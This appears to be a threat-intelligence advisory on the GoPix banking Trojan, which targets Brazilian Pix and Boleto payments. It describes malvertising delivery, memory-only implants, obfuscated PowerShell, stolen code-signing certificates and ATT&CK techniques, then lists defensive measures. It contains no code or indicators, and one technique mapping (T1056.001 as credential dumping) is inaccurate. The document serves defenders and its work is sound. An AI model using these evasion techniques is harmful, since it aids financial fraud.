GoPix is an advanced persistent threat (APT) banking Trojan primarily targeting Brazilian financial institutions and cryptocurrency users. It represents an evolution from previous Remote Access Trojans (RATs) and Automated Transfer Systems (ATS) malware, incorporating memory-only implants that avoid writing payloads to disk, thus reducing detection by traditional antivirus solutions. The malware uses heavily obfuscated PowerShell scripts to execute its payload and maintain stealth. Infection vectors include malvertising campaigns delivered through Google Ads, which redirect victims to malicious domains. Once inside a system, GoPix performs man-in-the-middle (MITM) attacks to intercept and monitor Pix transactions—a popular instant payment system in Brazil—and Boleto payment slips, enabling theft or manipulation of financial transactions. The malware also uses a stolen code signing certificate to appear legitimate and bypass security controls. Persistence is maintained through techniques such as registry run keys (MITRE ATT&CK T1547) and process injection (T1055). It employs multiple layers of obfuscation (T1027) and uses legitimate anti-fraud services to selectively deliver payloads to high-value targets, including state government financial bodies and large corporations. GoPix also features robust cleanup routines to remove traces post-operation, complicating incident response and forensic investigations. Despite its sophistication, no public CVE or known exploits in the wild have been reported. Indicators of compromise include specific file hashes and malicious domains used in its infrastructure. The threat leverages advanced techniques such as credential dumping (T1056.001), command and scripting interpreter abuse (T1059.001), and network communication through web services (T1102).

The GoPix Trojan poses significant risks to Brazilian financial institutions and cryptocurrency users by enabling attackers to intercept and manipulate financial transactions, potentially leading to substantial financial losses and reputational damage. Its ability to perform man-in-the-middle attacks on Pix and Boleto transactions threatens the integrity and confidentiality of payment processes, undermining trust in digital financial systems. The use of memory-only implants and obfuscated scripts complicates detection and remediation, increasing dwell time and the potential for extensive data exfiltration or fraud. Targeting state government financial bodies and large corporations could disrupt critical financial operations and public services. Additionally, the Trojan’s use of stolen code signing certificates and legitimate anti-fraud services to evade detection may reduce the effectiveness of standard security measures. While currently focused on Brazil, similar financial infrastructures elsewhere could be at risk if the malware adapts or spreads. The medium severity rating reflects the targeted nature and complexity of the threat, which requires specialized detection and response capabilities.

Organizations should implement advanced endpoint detection and response (EDR) solutions capable of detecting memory-only implants and anomalous PowerShell activity. Deploy behavioral analytics to identify suspicious man-in-the-middle activities, especially those targeting Pix and Boleto transaction monitoring. Regularly audit and restrict the use of PowerShell and other scripting environments, enforcing execution policies and logging all script executions. Validate code signing certificates and monitor for the use of stolen or unauthorized certificates. Employ network segmentation to isolate critical financial systems and restrict access to anti-fraud services to trusted entities only. Conduct threat hunting focused on the identified IoCs such as specific hashes and malicious domains associated with GoPix. Enhance user awareness training to recognize malvertising and phishing attempts, particularly those delivered via Google Ads. Implement multi-factor authentication (MFA) on financial systems to reduce the risk of unauthorized access. Maintain up-to-date threat intelligence feeds to monitor for emerging variants or related campaigns. Finally, establish robust incident response plans that include forensic capabilities to handle malware with cleanup routines.